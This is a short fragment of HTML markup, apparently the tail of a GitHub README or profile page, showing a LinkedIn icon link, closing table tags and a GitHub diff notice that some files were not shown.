<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

Some files were not shown because too many files have changed in this diff Show More